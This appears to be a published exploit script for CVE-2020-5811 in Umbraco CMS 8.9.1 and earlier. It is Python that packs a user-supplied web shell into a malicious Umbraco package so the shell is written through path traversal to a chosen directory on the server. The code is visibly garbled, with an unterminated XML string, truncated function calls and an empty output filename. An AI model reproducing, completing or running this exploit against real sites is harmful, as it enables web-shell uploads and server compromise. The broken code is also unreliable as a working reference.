# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
# Exploit Author: BitTheByte
# Description: Authenticated path traversal vulnerability.
# Exploit Research:
# Vendor Homepage:
# Version: <= 8.9.1 
# CVE : CVE-2020-5811

import string
import random
import argparse
import zipfile
import os

package_xml = f"""<?xml version="1.0" encoding="utf-8"?>
      <name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name>
      <license url="">MIT License</license>
  <DocumentTypes />
  <Templates />
  <Stylesheets />
  <Macros />
  <DictionaryItems />
  <Languages />
  <DataTypes />
  <Actions />

parser = argparse.ArgumentParser(description='CVE-2020-5811')
parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
args = parser.parse_args()

if not os.path.isfile(
  print("[ERROR] please use a correct path for the shell file.")

output_file = ""

package = zipfile.ZipFile(output_file, 'w')  
package.writestr('package.xml', package_xml.format(filename=os.path.basename(, upload_path=args.upload_path))
package.writestr(os.path.basename(, open(, 'r').read())

print(f"[DONE] Created Umbraco package: {output_file}")

# [2021-09-17]  #